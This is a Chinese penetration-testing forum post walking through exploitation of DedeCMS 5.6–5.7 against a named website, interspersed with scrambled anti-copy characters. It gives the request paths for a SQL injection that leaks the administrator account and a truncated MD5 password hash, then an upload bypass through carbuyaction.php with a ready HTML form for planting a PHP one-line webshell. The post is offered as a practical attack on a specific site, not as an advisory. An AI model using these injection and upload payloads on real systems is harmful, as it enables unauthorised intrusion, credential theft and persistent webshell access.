中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

---

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
; K9 o$ X8 I$ j3 H0 p& H3 {这站 http://www.political-security.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
9 g+ a3 `7 Z- ~9 }7 `0 Dwww.political-security.com/data/mysql_error_trace.inc 爆后台
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
然后写上语句
! P0 m; [" f4 Q- c; {* E查看管理员帐号
, F% Z9 ?" G" Jhttp://www.political-security.co ... &membergroup=@`
/ _" F8 ?4 k& [, ?8 H$ ?5 B- V0 K
/ n, X4 w/ N* ?admin
( W6 R% K, i( y- o8 j
* M1 H6 u! ?# [' _$ T查看管理员密码
1 \) |+ v. O; p* |0 V8 D( v　http://www.political-security.co ... &membergroup=@`
) S" m# H% K* B# b" `8 o; ~( L5 y
8d29b1ef9f8c5a5af429

# v' z4 u; O5 |  H2 G! V查看管理员密码

' @3 E( \4 }6 F4 }/ r- l0 v得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5
0 H. W4 w) z0 [2 c3 g
8d2
9b1ef9f8c5a5af42
9
) s% _9 @" G0 j) x
cmd5没解出来 只好测试第二个方法

+ Y8 [# S. ~# R- C" R# ?
②上传漏洞：

只要登陆会员中心，然后访问页面链接
; |8 F( e8 K. c4 j9 r“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”

如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

1 w* e- [2 e. T& h2 F  {& p于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
或者
7 J- B2 I% c" L* v6 K  ?) D即可上传成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2